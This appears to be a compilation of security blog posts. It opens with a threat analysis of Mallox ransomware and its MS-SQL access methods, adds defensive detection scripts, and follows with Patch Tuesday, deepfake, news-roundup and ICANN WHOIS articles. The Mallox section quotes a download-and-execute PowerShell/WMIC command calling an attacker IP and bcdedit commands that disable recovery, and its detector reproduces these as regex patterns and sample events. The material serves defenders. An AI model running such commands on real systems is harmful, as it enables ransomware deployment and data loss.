Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises

The ransomware landscape is characterized by a heavy churn in both actor groups and malware families, with only a few players exhibiting relative longevity. Once feared threats such as REvil and Conti have either been dismantled or dissolved, while others – ALPHV, Black Basta and LockBit, for example – continue to extort businesses with impunity. To this second list we can also add Mallox (aka TargetCompany), a lesser-known but long-running ransomware threat first seen in 2021. Today, the group continues to steal and leak a steady stream of enterprise data.

In this post, we highlight recent Mallox activity, explain the group’s initial access methods and provide a high-level analysis of recent Mallox payloads to help defenders better understand and defend against this persistent threat.

Mallox Ransomware Overview

Operating under a Ransomware-as-a-Service (RaaS) model, Mallox leverages well-known underground forums and markets such as Nulled and RAMP to advertise its service and recruit affiliates. The group maintains a TOR-based leaks site where it regularly makes announcements about recently compromised organizations and exposes stolen data. Mallox also maintains a presence on Twitter/X for similar purposes.

Mallox on social media platform X/Twitter

Initial Access | Focus on MS-SQL & Brute Force Attacks

Mallox primarily gains initial access through the exploitation of vulnerable and publicly exposed services, with a particular focus on MS-SQL (Microsoft SQL Server) and ODBC (Open Database Connectivity) interfaces. Specific vulnerabilities are targeted, including unpatched instances of old remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.

In addition, the group makes successful use of brute force attacks against weakly configured services and applications open to the public internet. In recent campaigns Mallox actors gained initial access through dictionary-based brute-force attacks against weak MS-SQL interfaces. However, other vectors are known to be used by Mallox affiliates, including phishing emails to deliver attack frameworks such as Cobalt Strike and Sliver.
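The dictionary attacks described above leave a dense trail of failed logins in the SQL Server ERRORLOG. As an added example (not SentinelOne tooling), the following script parses those "Login failed for user" entries (error 18456) and flags any client address whose failures exceed a threshold inside a sliding window; the log lines, addresses and account names are constructed samples.

```python
"""Flag brute-force bursts against SQL Server from its ERRORLOG.

Added example for this write-up, not SentinelOne detection content.
SQL Server records each rejected login (error 18456) as a 'Login failed
for user' line that ends with the caller's address in '[CLIENT: a.b.c.d]'.
One client address failing repeatedly in a short window is the signature
of the dictionary attacks described in the post. Sample lines, addresses
and account names below are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the failed-login line only; the preceding "Error: 18456 ..." line is ignored.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)

THRESHOLD = 5                    # failures from one client address ...
WINDOW = timedelta(seconds=60)   # ... inside this sliding window

# Constructed ERRORLOG excerpt: one stray failure from an internal host and a
# burst of six failures in four seconds from one external address.
SAMPLE_LOG = """\
2023-12-11 03:12:00.00 Logon       Error: 18456, Severity: 14, State: 8.
2023-12-11 03:12:00.00 Logon       Login failed for user 'app_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2023-12-11 03:14:07.55 Logon       Error: 18456, Severity: 14, State: 8.
2023-12-11 03:14:07.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2023-12-11 03:14:08.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2023-12-11 03:14:08.47 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2023-12-11 03:14:09.02 Logon       Error: 18456, Severity: 14, State: 5.
2023-12-11 03:14:09.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.23]
2023-12-11 03:14:09.58 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2023-12-11 03:14:10.13 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
"""


def parse_failures(lines):
    """Yield (timestamp, user, client) for every failed-login line."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                   m["user"], m["client"])


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {client: {"failures": n, "users": [...]}} for every client whose
    failed logins reach `threshold` within any `window`-long span.

    "failures" is the largest number of failures seen inside one window and
    "users" lists every account that client tried: one account hammered many
    times is a password dictionary attack on it (typically sa), many accounts
    from one client is username guessing.
    """
    recent = defaultdict(deque)   # client -> failure timestamps still inside the window
    users = defaultdict(set)      # client -> accounts it attempted
    alerts = {}
    for ts, user, client in parse_failures(lines):
        q = recent[client]
        q.append(ts)
        users[client].add(user)
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            seen = alerts.get(client, {}).get("failures", 0)
            alerts[client] = {"failures": max(seen, len(q)),
                              "users": sorted(users[client])}
    return alerts


if __name__ == "__main__":
    for client, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {client}: {info['failures']} failed logins in {WINDOW.seconds}s, "
              f"accounts tried: {', '.join(info['users'])}")
```

The same parser works on a live ERRORLOG tail; the threshold and window are the knobs to tune against the normal failure rate of a given instance.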

Post-Compromise Attack Behavior

After gaining initial access, Mallox threat actors typically execute PowerShell commands to run various batch scripts and download the ransomware payload.

Scripts such as Kill-Delete.bat or Bwmeldokiller.bat are used to terminate or remove running processes that may interfere with or prevent the ransomware’s encryption routine.

Example of the kill-delete.bat script

Commands are executed to download and launch the ransomware payloads. The following provides a typical example:

/C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & 
echo $cl.DownloadFile("hXXp://80[.]66.75[.]40/XXXXXXXXX.exe", "%TEMP%\xxxx.exe") >> %TEMP%\updt.ps1 & 
powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & 
WMIC process call create "%TEMP%\XXXXXXXX.exe"

The command sequence first writes a short PowerShell script into the system’s temporary directory, using the .NET WebClient class to download an executable from a remote server. It then runs that updt.ps1 script with the -ExecutionPolicy Bypass switch so that the host’s script execution policy does not block it, and finally uses Windows Management Instrumentation (via WMIC) to launch the downloaded ransomware payload.

Recent Payloads | Mallox.Resurrection

Mallox variants from 2021 to today display a highly consistent set of core functionalities, indicating that threat actors continue to achieve success with a tried and tested formula. Recent payloads are labeled “Mallox.Resurrection”, reflecting a change in the ransom notes deposited after encryption.

Hard-coded exclusions exempt a number of file types and processes from encryption. File types are excluded through named extensions:

.386 .adv .ani .avast .bat .bin .cab .cmd .com .cpl .cur 
.deskthemepack .diagcfg .diagpkg .diangcab .dll .drv .exe 
.Globeimposter-Alpha865qqz .hlp .hta .icl .icns .ico .ics .idx 
.key .lnk .lock .mallox .mallox .mod .mpa .msc .msi .msp .msstyles 
.msu .nls .nomedia .ocx .prf .ps1 .rom .rtp .scr .shs .spl .sys .theme .themepack .wpx 

Processes are excluded or ignored based on the existence of certain strings in the path name (e.g., “Windows Defender” ).

"$windows ~bt"                  "Package Store"
"$windows ~ws"                  "Package"
"appdata"                       "perflogs"
"application data"              "programdata"
"Assemblies"                    "Reference"
"boot"                          "Store"
"boot"                          "system volume information"
"Common Files"                  "tor browser"
"Core Runtime"                  "Windows"
"google"                        "Windows Defender"
"intel"                         "Windows Kits"
"Internet Explorer"             "Windows Mail"
"Microsoft Analysis Services"   "Windows Microsoft NET"
"Microsoft ASP NET"             "Windows NT"
"Microsoft Help Viewer"         "Windows Photo Viewer"
"Microsoft MPI"                 "Windows Portable Devices"
"Microsoft Security Client"     "windows old"
"Microsoft Security Client"     "Windows"
"Microsoft NET"                 "WindowsPowerShell"
"mozilla"

Upon launch, the ransomware spawns the following commands:

bcdedit.exe  /set {current} bootstatuspolicy ignoreallfailures
bcdedit.exe  /set {current} recoveryenabled no

These serve to alter the Boot Configuration Data (BCD) settings, affecting the OS’s ability to recover from failure and preventing administrators from restoring the system with Windows built-in tools.
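The staging chain above (script dropped with echo redirects, PowerShell run with -ExecutionPolicy Bypass from the temp folder, WMIC launching the payload, bcdedit disabling recovery) is easy to recognise in process-creation telemetry. As an added detection example (not SentinelOne detection content), the following script scores constructed Sysmon-style process events against one rule per step and reports a host when two or more distinct steps fire within ten minutes; hostnames, paths and the URL are placeholders.

```python
"""Score process-creation events for the Mallox staging chain.

Added example for this write-up, not SentinelOne detection content. The
events are constructed records shaped like Sysmon Event ID 1 / EDR process
telemetry (host, ISO timestamp, command line). Each rule corresponds to one
step described in the post; two or more distinct steps on one host inside
WINDOW of each other is reported as a probable ransomware staging chain,
which keeps a lone admin "bcdedit /enum" or a signed deployment script quiet.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)

# cmd.exe logs %TEMP% unexpanded; child processes show the expanded ...\Temp\ path.
TEMP = r"(?:%temp%|\\temp)\\"

# All patterns are case-insensitive because cmd.exe and PowerShell arguments are.
RULES = {
    # .ps1 assembled with echo redirects, pulling a file with WebClient/DownloadFile
    "ps1_dropped_via_echo": re.compile(
        r"echo\s.*(?:WebClient|DownloadFile).*>>?\s*" + TEMP + r"[^\s&]*\.ps1", re.I),
    # PowerShell executing a temp-folder script with the execution policy bypassed
    "bypass_policy_temp_script": re.compile(
        r"powershell.*-executionpolicy\s+bypass.*" + TEMP + r"[^\s&]*\.ps1", re.I),
    # WMIC used to spawn an executable that lives in the temp folder
    "wmic_spawn_from_temp": re.compile(
        r"wmic\s+process\s+call\s+create\s+.*" + TEMP + r'[^"\s]*\.exe', re.I),
    # BCD changes that disable Windows recovery, as spawned by the payload
    "bcd_recovery_disabled": re.compile(
        r"bcdedit(?:\.exe)?\s+/set\s+\{current\}\s+"
        r"(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
}

# Constructed events: WS01 shows the full chain, WS02 only benign look-alikes.
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": "2023-12-11T03:30:01", "cmd":
     r'cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & '
     r'echo $cl.DownloadFile("http://203.0.113.7/x.exe", "%TEMP%\svc.exe") >> %TEMP%\updt.ps1 & '
     r'powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create "%TEMP%\svc.exe"'},
    {"host": "WS01", "ts": "2023-12-11T03:30:02", "cmd":
     r"powershell -ExecutionPolicy Bypass C:\Users\dba\AppData\Local\Temp\updt.ps1"},
    {"host": "WS01", "ts": "2023-12-11T03:30:09", "cmd":
     r'WMIC process call create "C:\Users\dba\AppData\Local\Temp\svc.exe"'},
    {"host": "WS01", "ts": "2023-12-11T03:30:15", "cmd":
     r"bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures"},
    {"host": "WS01", "ts": "2023-12-11T03:30:15", "cmd":
     r"bcdedit.exe /set {current} recoveryenabled no"},
    {"host": "WS02", "ts": "2023-12-11T09:00:00", "cmd":
     r"powershell -ExecutionPolicy Bypass C:\Scripts\deploy.ps1"},   # not from temp
    {"host": "WS02", "ts": "2023-12-11T09:05:00", "cmd": r"bcdedit.exe /enum"},
]


def match_rules(cmd):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))


def evaluate(events, window=WINDOW):
    """Return {host: {"rules": [...], "first": ts, "last": ts}} for each host where
    at least two distinct rules fired within `window` of each other."""
    hits = defaultdict(list)          # host -> [(timestamp, rule name)]
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        for name in match_rules(ev["cmd"]):
            hits[ev["host"]].append((ts, name))
    findings = {}
    for host, host_hits in hits.items():
        host_hits.sort()
        for t0, _ in host_hits:       # try each hit as the start of a window
            cluster = [(t, r) for t, r in host_hits if t0 <= t <= t0 + window]
            distinct = sorted({r for _, r in cluster})
            if len(distinct) >= 2:
                findings[host] = {"rules": distinct,
                                  "first": cluster[0][0].isoformat(),
                                  "last": cluster[-1][0].isoformat()}
                break
    return findings


if __name__ == "__main__":
    for host, f in evaluate(SAMPLE_EVENTS).items():
        print(f"{host}: {len(f['rules'])} chain steps between {f['first']} and {f['last']}: "
              + ", ".join(f["rules"]))
```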

Encrypted files are appended with the .mallox extension, and a ransom note with the file name “HOW TO BACK FILES.TXT” is written to each folder containing locked files. The ransom note contains instructions on how to obtain a decryption tool using TOR and contains a TargetID, a unique identifier for the victim. Beginning in mid-2023, we observed that the contact email in the Mallox ransom notes changed from “mallox@onionmail” to “mallox.resurrection@onionmail.org”.

In addition to the ransom notes, a file called “Targetinfo.txt” is written to the user’s Desktop. This file also contains the TargetID along with basic details of the host’s environment (OS version, architecture, hostname, etc.).

Example of a Mallox.Resurrection ransom note

Victims who do not respond to the ransom demand are threatened with exposure of their data on the group’s data leak site.

Mallox Data Leak Site

Conclusion

Despite previously suffering setbacks such as the release of a public decryptor for earlier versions of its payloads, Mallox has maintained a steady stream of compromises and iterated on successful versions of its ransomware. The continued abuse of unpatched MS-SQL interfaces and brute-forcing of weak passwords suggests the group sees little need to alter its MO while organizations leave such a fruitful avenue open to exploitation.

The group’s longevity provides a sharp reminder that cybersecurity basics will go a long way to keeping such threats at bay. Reviewing and hardening applications and services exposed to the public internet is strongly recommended, along with deployment of appropriate endpoint and cloud security solutions like SentinelOne.

All SentinelOne customers are protected from Mallox ransomware.

To learn about how SentinelOne can help protect the devices in your fleet from ransomware and other threats, contact us or request a free demo.

Indicators of Compromise

3d434b7cc9589c43d986bf0e1cadb956391b5f9a  updt.ps1
9295a02c49aa50475aa7876ca80b3081a361ff7d  updt.ps1

3fa79012dfdac626a19017ed6974316df13bc6ff  Bwmeldokiller.bat
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196  Kill-Delete.bat


Mallox DLS (Data Leak Site)
http[:]//wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion/


Microsoft Patch Tuesday, December 2023 Edition

The final Patch Tuesday of 2023 is upon us, with Microsoft Corp. today releasing fixes for a relatively small number of security holes in its Windows operating systems and other software. Even more unusual, there are no known “zero-day” threats targeting any of the vulnerabilities in December’s patch batch. Still, four of the updates pushed out today address “critical” vulnerabilities that Microsoft says can be exploited by malware or malcontents to seize complete control over a vulnerable Windows device with little or no help from users.

Among the critical bugs quashed this month is CVE-2023-35628, a weakness present in Windows 10 and later versions, as well as Microsoft Server 2008 and later. Kevin Breen, senior director of threat research at Immersive Labs, said the flaw affects MSHTML, a core component of Windows that is used to render browser-based content. Breen notes that MSHTML also can be found in a number of Microsoft applications, including Office, Outlook, Skype and Teams.

“In the worst-case scenario, Microsoft suggests that simply receiving an email would be enough to trigger the vulnerability and give an attacker code execution on the target machine without any user interaction like opening or interacting with the contents,” Breen said.

Another critical flaw that probably deserves priority patching is CVE-2023-35641, a remote code execution weakness in a built-in Windows feature called the Internet Connection Sharing (ICS) service that lets multiple devices share an Internet connection. While CVE-2023-35641 earned a high vulnerability severity score (a CVSS rating of 8.8), the threat from this flaw may be limited somewhat because an attacker would need to be on the same network as the target. Also, while ICS is present in all versions of Windows since Windows 7, it is not on by default (although some applications may turn it on).

Satnam Narang, senior staff research engineer at Tenable, notes that a number of the non-critical patches released today were identified by Microsoft as “more likely to be exploited.” One example is CVE-2023-35636, which Microsoft says is an information disclosure vulnerability in Outlook. An attacker could exploit this flaw by convincing a potential victim to open a specially crafted file delivered via email or hosted on a malicious website.

Narang said what makes this one stand out is that exploitation of this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

“It is reminiscent of CVE-2023-23397, an elevation of privilege vulnerability in Microsoft Outlook that was exploited in the wild as a zero day and patched in the March 2023 Patch Tuesday release,” Narang said. “However, unlike CVE-2023-23397, CVE-2023-35636 is not exploitable via Microsoft’s Preview Pane, which lowers the severity of this flaw.”

As usual, the SANS Internet Storm Center has a good roundup on all of the patches released today and indexed by severity. Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Beyond Illusion | Addressing the Cybersecurity Impact of Deepfakes and Synthetic Media

In the last few years, slowly but steadily, the boundary between reality and fiction in the digital realm has become increasingly blurred thanks to the advent of deepfake technology.

Sophisticated, AI-powered synthetic media has evolved from a novel concept in Hollywood to a practical tool used daily by politically-motivated threat actors and cybercriminals for misinformation and fraud.

Since we last wrote about deepfakes a lot has changed. There are new powerful actors, with both old and new grievances, and of course, an explosion in the availability and capabilities of AI. Our trust in the veracity of what we see online has never been lower, nor more fragile.

In this post, we delve into the world of deepfakes as we see it today, exploring the nature, risks, real-life impacts, and measures needed to counter these advanced threats.

What Are Deepfakes?

Deepfakes are artificially-created media, typically video and audio, that purport to show events or people engaging in behaviors that never in fact occurred. They leverage sophisticated artificial intelligence (AI) and machine learning technologies, in particular generative adversarial networks (GANs).

GANs involve two AI models: one that generates content (the generator) and another that evaluates its authenticity (the discriminator). The generator creates increasingly realistic fake videos or audio, while the discriminator continuously assesses the content’s verisimilitude, leading to a rapid improvement in the quality and believability of the generated fakes.

Originally, deepfakes found their place in entertainment and social media, providing novel ways to create content, like superimposing celebrities’ faces onto different bodies in videos or enabling realistic voice impersonations. However, this technology’s potential for creating highly convincing forgeries soon transitioned from mere novelty to a potent tool for misinformation and manipulation.

The Cybersecurity Risks of Deepfakes | A Broad Spectrum

From political disinformation to financial deception, the ramifications of deepfakes are far-reaching and multifaceted. Let’s explore some key examples to understand the breadth and depth of these risks.

Political Disinformation

Deepfakes pose a significant risk to political stability by spreading false narratives and manipulating public opinion, particularly when they are used to create misleading representations of political figures. The first notable example occurred in 2018, when BuzzFeed released a deepfake of President Obama.

Since then, many others have come to light; a deepfake video of Ukrainian President Volodymyr Zelensky falsely portrayed him as conceding defeat and urging Ukrainians to surrender to Russia. Aimed at misleading and demoralizing the public, the video was identified as fake due to discrepancies such as the mismatched size of Zelensky’s head to his body.

Corporate Espionage

In the corporate world, deepfakes have emerged as tools for fraud and deception with the potential to cause substantial financial losses. Such scams can be particularly effective when impersonating high-level executives. A UK-based energy firm lost €220,000 after AI software was used to imitate the voice of the CEO of the firm’s German parent company and instruct the UK CEO to urgently transfer funds.

Personal Identity Theft and Harassment

Personal rights and privacy are, of course, highly susceptible to harm from fake media when it is used to commit identity theft and harassment. Malicious media creations can be alarmingly realistic. In Germany, the government was so concerned about the threat of deepfakes that it released an ad campaign to highlight the dangers, warning parents about the risks associated with these technologies.

Financial Market Manipulation

Beyond harm to individual persons or organizations, deepfakes can disrupt entire financial markets by swaying investor decisions and market sentiments with false narratives. An illustrative case was the deepfake video depicting a supposed explosion near the Pentagon, which briefly impacted the US stock markets.

Legal and Judicial Misuse

In the legal domain, deepfakes can be used to fabricate evidence, potentially leading to miscarriages of justice and undermining the integrity of judicial processes. Although a specific widespread instance in legal settings is yet to occur, the potential for deepfakes to be used in this manner raises concerns about the reliability of video and audio evidence in courtrooms and the need for enhanced verification measures to ensure judicial integrity.

Detecting and Combating Deepfakes | On the Cybersecurity Frontline

As with any tool, AI can be used for both good and bad, and there are efforts underway to develop AI-driven methods to detect and combat the threat of deepfakes. Many of these efforts focus on analyzing facial expressions and voice biometrics to spot subtle anomalies that are undetectable to the human eye and ear. This involves using machine learning models and training them on extensive datasets containing both genuine and manipulated media in order to effectively distinguish between the two.

Blockchain technology, more typically associated with cryptocurrencies, is also emerging as a useful tool in this fight. Blockchain provides a way to verify the source and authenticity of media files and confirm whether they have been altered. So-called “smart contracts” can be used both to verify the authenticity of digital content and to trace how it is interacted with, including any modifications. Combined with AI that can flag media content as potentially inauthentic, a smart contract can trigger a review process or alert relevant authorities or stakeholders.

Other tools are being developed to ensure that content created by AI platforms can be detected as artificial. For example, Google’s SynthID can embed inaudible “watermarks” in AI-generated audio content. Methods like SynthID are intended to ensure that content generated by AI tools remains reliably detected as artificially generated even after it has been manipulated by humans or other editing software.

As in other areas of cybersecurity, education and awareness campaigns have an important part to play in combating the threat of deepfakes. Educating individuals and organizations about deepfakes, how to spot them, and their potential impact will be essential. Collaborations between technology companies, cybersecurity experts, government agencies, and educational institutions will prove to be vital over the next few years as we strive to develop more comprehensive strategies to combat artificially-generated content used for ill ends.

Best Practices for Organizations and Individuals in the Era of Deepfakes

As the threat landscape shaped by deepfakes continues to evolve, it is increasingly important to adopt strategies to mitigate risks associated with the misuse of AI technology. Here is our guide to current best practices and measures to enhance resilience against deepfake-related security threats.

Raising Awareness and Training

Education is the cornerstone of defense against deepfakes. Conducting regular training sessions for employees to recognize deepfakes can significantly lower the risk of deception. This training should focus on the subtleties of synthetic media and keep abreast of the latest developments in deepfake technology.

Cultivating a verification culture within organizations, where any unusual or suspicious communication, particularly involving sensitive information, is cross-verified through multiple channels, is also crucial.

Implementing Robust Verification Processes

For critical communications, especially in financial and legal contexts, implementing multi-factor authentication and rigorous verification processes is indispensable. For instance, voice and video call confirmations for high-stake transactions or sensitive information sharing can be effective. Such practices can prevent incidents similar to the aforementioned case in which a CEO’s voice was faked for fraudulent activities.

Utilizing Advanced Cybersecurity Solutions

We can leverage AI to defeat AI by incorporating advanced cybersecurity solutions with deepfake detection capabilities. Tools employing AI and machine learning to analyze and flag potential deepfakes add an important layer of security.

Regular Software and Security Updates

Maintaining up-to-date software, including security solutions, is vital for cybersecurity. Updates often contain patches for newly identified vulnerabilities that could be exploited by deepfakes and other cyber threats. A proactive stance on software updates can significantly reduce the likelihood of security breaches.

Collaborating with External Experts

For organizations, particularly those with limited in-house cybersecurity capabilities, partnering with external security experts can offer enhanced protection. These professionals can provide insights into the latest threats and assist in crafting strategies specifically designed to counter deepfakes and other emerging cyber risks.

Personal Vigilance

As individuals, it is important for all of us to maintain vigilance when engaging with media. This includes maintaining a healthy skepticism towards sensational or controversial content and verifying sources before sharing or acting on such information.

Utilizing tools and browser extensions that assist in detecting deepfakes can also contribute to stronger personal cybersecurity practices.

It’s also worth remembering that, like any other creation, deepfakes come with varying degrees of quality and attention to detail from the creator. That means in some cases it is still possible to spot less-advanced or sophisticated deepfakes. Some things to watch out for include:

  • Unnatural Eye Movements: AI-generated images or videos can fail to accurately replicate intricate and natural eye movements. This discrepancy can manifest as unusual blinking patterns or a lack of natural eye movement.
  • Audio-Video Sync Issues: Some deepfakes can fail to sync spoken words and lip movements, leading to noticeable discrepancies.
  • Color and Shadow Inconsistencies: AI often struggles with consistently rendering colors and shadows, especially in varying lighting conditions. Look out for inconsistencies in skin tones or background colors. Shadows might appear misplaced or of the wrong intensity.
  • Unusual Body Movements: AI might also struggle to maintain the consistency of body shapes, leading to noticeable distortions or irregularities. This might include jerky, unnatural movements or expressions that don’t align with how a person typically moves or reacts.

In short, combating deepfakes requires a multi-faceted approach, combining education, robust verification processes, advanced technology, software maintenance, expert collaboration, and personal vigilance. These practices form an integral part of a comprehensive strategy to counter the growing sophistication of deepfakes in the cybersecurity landscape. As a bonus, they will also help protect against other kinds of cybersecurity threats and serve to encourage the security mindset individuals and organizations need in today’s digital-centric world.

The Future of Deepfakes and Cybersecurity

The deepfake genie is out of the bottle and we cannot wish it away. Rather, as deepfakes become increasingly prevalent and ever-more subtle, we will need to evolve effective responses. This will entail development in certain key areas.

Aside from continued development of advanced authentication tools, industry leaders, including AI developers like OpenAI and cybersecurity firms, will need to steer the development and application of AI technologies to both establish ethical guidelines and ensure robust defense mechanisms against deepfake threats.

New legislation and regulations will also be required to prohibit and penalize the creation and dissemination of deepfakes for harmful purposes. Due to the transnational nature of digital media, international collaboration in legal frameworks will also be needed to effectively combat deepfakes.

As we’ve noted above, educating the public about deepfakes and enhancing media literacy are an integral part of countering the threat of manipulated media. Technology and regulation alone cannot win the fight across the broad spectrum of online surfaces in which misinformation can be disseminated.

The inevitable proliferation of deepfakes demands a multi-dimensional approach, combining technological innovations, ethical industry practices, informed legislative measures, and public education. We are only at the mercy of technology when we fail to take the time to understand its implications or develop the appropriate controls. When it comes to AI and deepfakes, we still have meaningful opportunities to do both.

The Good, the Bad and the Ugly in Cybersecurity – Week 49

The Good | Co-Founder of Criminal Crypto Exchange Pleads Guilty to Money-Laundering Schemes

Anatoly Legkodymov (aka “Gandalf” or “Tolik”), co-founder of the Bitzlato cryptocurrency exchange, has pleaded guilty to his role in aiding ransomware gangs and other cybercriminals in laundering over $700 million. Legkodymov has agreed to disband Bitzlato and forfeit his claim to approximately $23 million in seized assets, according to the terms of his plea agreement.

Source: Forbes

Bitzlato reportedly saw widespread illicit activity on its platform. The exchange promoted a user registration process with minimal identification requirements, explicitly stating that neither selfies nor passports were necessary. According to the DoJ, this lax approach led to Bitzlato becoming a haven for criminal proceeds and funds intended for a variety of malicious activities.

Reports on cryptocurrency-related illicit activity revealed that Bitzlato conducted over $2 billion in cryptocurrency transactions between 2019 to 2021 alone. Nearly 48% of this amount, approximately $966 million, was associated with high-risk cryptocurrency transactions and deemed illicit. The exchange received funds totaling $206 million from darknet markets, $224.5 million from scams, and $9 million from ransomware attackers.

The crypto exchange was also known to be particularly entwined with the Hydra Market, facilitating more than $700 million worth of cryptocurrency exchanges until the dark market was shut down by U.S. and German law enforcement in April 2022. The exchange also received millions in ransomware proceeds, despite repeated warnings to Legkodymov that the routed cryptocurrency represented the proceeds of crime and was intended for illicit transactions.

Dismantling Bitzlato’s digital infrastructure and the subsequent seizure of its domains was a collaborative effort from Europol and authorities in France, Spain, Portugal, and Cyprus. After his initial arrest in Miami earlier this year, Legkodymov now faces a maximum sentence of five years in prison for his role in the illicit activities associated with Bitzlato.

The Bad | APT28 Actors Re-Use Old Outlook Vulnerability to Access Polish Exchange Accounts

Security researchers have identified the Russian state-sponsored actor APT28 (aka Fancy Bear or Sofacy) exploiting a recently-patched flaw (CVE-2023-23397) in Microsoft Outlook to gain unauthorized access to accounts within Exchange servers. Before it was fixed in March, targets spanned critical sectors in the United States, Europe, and the Middle East. Based on the new wave of attacks, Polish Cyber Command (DKWOC) reports that the attacker’s goal now is to obtain unauthorized access to mailboxes belonging to public and private entities that have yet to patch their instances.

CVE-2023-23397 is a critical-level (CVSS score: 9.8) elevation of privilege (EoP) vulnerability triggered by a specially-crafted email message that is sent to a targeted user. Once the message is opened, the user’s Net-NTLMv2 hash is transmitted to the attacker, allowing them to manipulate the access permissions of specific mailboxes and steal sensitive information and/or credentials.

Source: Microsoft

The state-sponsored group linked to APT28 has been active since 2008, known most widely for interfering in the 2016 U.S. presidential election and their engagement in various hack-and-leak operations. Their victims are typically high-value, coming from governments, military, and private sectors. Just two months ago, the National Cybersecurity Agency of France (ANSSI) pinned a cluster of attacks on agencies, universities, think tanks, and research institutions onto the threat group, where they leveraged a combination of flaws, including CVE-2023-23397, to deploy stealers in prominent web browsers.

APT28 commonly employs other known vulnerabilities as part of their attack methods, such as CVE-2023-38831 or CVE-2021-40444. The recent incidents underscore the persistent challenges posed by sophisticated state-sponsored threat actors and the importance of promptly applying security patches to mitigate the risk of exploitation.

The Ugly | Unidentified Actors Exploit Adobe ColdFusion Flaw to Breach U.S. Government Servers

Threat actors are actively exploiting a high-severity vulnerability found in Adobe’s ColdFusion to gain initial access into U.S. government servers. According to CISA’s latest warning on the mounting attacks, the flaw tracked as CVE-2023-26360 presents an improper access control issue that could lead to arbitrary code execution.

Source: CISA

The advisory highlights two incidents of exploitation where CVE-2023-26360 was utilized to compromise federal agency systems. Both instances involved outdated server software vulnerable to various CVEs, with threat actors leveraging the vulnerability to deploy malware through HTTP POST commands to the ColdFusion-associated directory path.

During the first incident, attackers breached a server running Adobe ColdFusion v2016.0.0.3. They performed process enumeration, network checks, and installed a web shell for code injection into a ColdFusion configuration file to extract credentials. The attackers then followed with tactics such as file deletion and creation in specific directories to conceal their activities.

The second incident involved attackers exploiting the flaw on a server running Adobe ColdFusion v2021.0.0.2. After gathering user account information, they deployed a remote access trojan in the form of a text file. Attempts were made to exfiltrate Registry files and security account manager (SAM) information, utilizing security tools to access a directory on domain controllers. Fortunately, both attacks were detected and thwarted before any data exfiltration or lateral movement occurred, with compromised assets removed from critical networks within 24 hours.

CISA categorizes these incidents as reconnaissance efforts, although it remains uncertain whether the same threat actor is responsible for both intrusions. To mitigate risks, CISA recommends updating ColdFusion to the latest version, implementing network segmentation, configuring firewalls or web application firewalls (WAFs), and enforcing policies for signed software execution.

ICANN Launches Service to Help With WHOIS Lookups

More than five years after domain name registrars started redacting personal data from all public domain registration records, the non-profit organization overseeing the domain industry has introduced a centralized online service designed to make it easier for researchers, law enforcement and others to request the information directly from registrars.

In May 2018, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — instructed all registrars to redact the customer’s name, address, phone number and email from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges.

ICANN made the policy change in response to the General Data Protection Regulation (GDPR), a law enacted by the European Parliament that requires companies to gain affirmative consent for any personal information they collect on people within the European Union. In the meantime, registrars were to continue collecting the data but not publish it, and ICANN promised it would develop a system that facilitates access to this information.

At the end of November 2023, ICANN launched the Registration Data Request Service (RDRS), which is designed as a one-stop shop to submit registration data requests to participating registrars. This video from ICANN walks through how the system works.

Accredited registrars don’t have to participate, but ICANN is asking all registrars to join and says participants can opt out or stop using it at any time. ICANN contends that the use of a standardized request form makes it easier for the correct information and supporting documents to be provided to evaluate a request.

ICANN says the RDRS doesn’t guarantee access to requested registration data, and that all communication and data disclosure between the registrars and requestors takes place outside of the system. The service can’t be used to request WHOIS data tied to country-code top level domains (CCTLDs), such as those ending in .de (Germany) or .nz (New Zealand), for example.

The RDRS portal.

As Catalin Cimpanu writes for Risky Business News, currently investigators can file legal requests or abuse reports with each individual registrar, but the idea behind the RDRS is to create a place where requests from “verified” parties can be honored faster and with a higher degree of trust.

